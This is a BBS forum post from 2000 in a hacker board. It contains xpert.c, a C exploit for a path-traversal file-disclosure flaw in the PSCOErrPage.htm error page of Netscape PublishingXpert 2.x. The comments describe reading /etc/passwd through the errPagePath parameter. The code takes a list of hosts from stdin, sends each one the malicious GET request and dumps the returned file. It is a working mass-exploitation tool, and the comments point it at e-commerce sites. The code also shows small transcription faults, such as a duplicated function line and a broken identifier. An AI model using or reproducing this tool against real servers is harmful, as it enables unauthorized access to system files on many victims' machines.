荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: bstone (Sealed!), 信区: Hacker
标 题: xpert.c
发信站: BBS 荔园晨风站 (Fri Apr 14 23:29:31 2000), 站内信件
发信人: cloudsky (小四), 信区: Security
标 题: xpert.c
发信站: 武汉白云黄鹤站 (Thu Apr 13 14:34:48 2000), 站内信件
/*
Netscape PublishingXpert 2.* file-reading/dir-listing
vuln in PSCOErrPage.htm by \x00\x00
0s vuln:
SunOS 5.6 and SunOS 5.5.1 (others versions affected possibly)
discription:
PSCOErrPage.htm is a error handler message page, when theirs
a server error usually you will get fowarded to this along
with a url query like this:
/PSUser/PSCOErrPage.htm?errPagePath=%2Fusr%2FPublishingXpert%2F2.5%2Fbin%2Fpsuh
%2F= /
so we can make this a little bit more visible by changing
the url to be more clearly visible for us. Lets also remove
that junk info "&errMsg=" and see what we have got...
/PSUser/PSCOErrPage.htm?errPagePath=/usr/PublishingXpert/2.5/bin/psuser/en/como
n/PSCO_ErrPage.pat
Yes, thats a fully specified filename, meaning we can input
whatever we want. In our case lets say we wanted to snag
/etc/passwd just request the fallowing:
exploit:
/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
Alot of big e-commernce sites are vuln to this, but luckily
scence the level of the cgi script dose not have root
permisions, meaning your shadow file and other root files are safe.
Usage:
xpert <infile><outfile>
*/
*/
#include <sys/stat.h>
#include <sys/types.h>
#include <termios.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/syslog.h>
#include <sys/param.h>
#include <sys/times.h>
#ifdef LINUX
#include <sys/time.h>
#endif
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/signal.h>
#include <arpa/inet.h>
#include <netdb.h>
int FLAG = 1;
int Call(int signo)
int Call(int signo)
{
FLAG = 0;
}
main (int argc, char *argv[])
{
char host[100], buffer[1024], hosta[1024],FileBuf[8097];
int outsocket, serv_len, len,X,c,outfd;
struct hostent *nametocheck;
struct sockaddr_in serv_addr;
struct in_addr outgoing;
char rmpMessage[]="GET /PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd\n";
while(fgets(hosta,100,stdin))
{
if(hosta[0] == '\0')
break;
hosta[strlen(hosta) -1] = '\0';
write(1,hosta,strlen(hosta)*sizeof(char));
write(1,"\n",sizeof(char));
outsocket = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family = AF_INET;
nametocheck = gethostbyname (hosta);
(void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0], sizeof(outgi
ng.s_addr));
strcpy (host, inet_ntoa (outgoing));
serv_addr.sin_addr.s_addr = inet_addr (host);
serv_addr.sin_port = htons (80);
signal(SIGALRM,Call);
FLAG = 1;
alarm(10);
X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
alarm(0);
if(FLAG == 1 && X==0){
write(outsocket,rmpMessage,strlen(rmpMessage)*sizeof(char));
while((X=read(outsocket,FileBuf,8096))!=0) write(1,FileBuf,X);
}
close (outsocket);
}
FLAG = 1;
return 0;
}
--
我问飘逝的风:来迟了?
风感慨:是的,他们已经宣战。
我问苏醒的大地:还有希望么?
大地揉了揉眼睛:还有,还有无数代的少年。
我问长空中的英魂:你们相信?
英魂带着笑意离去:相信,希望还在。
※ 来源:.武汉白云黄鹤站 bbs.whnet.edu.cn.[FROM: 203.207.226.124]
--
☆ 来源:.BBS 荔园晨风站 bbs.szu.edu.cn.[FROM: bbs@192.168.28.106]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店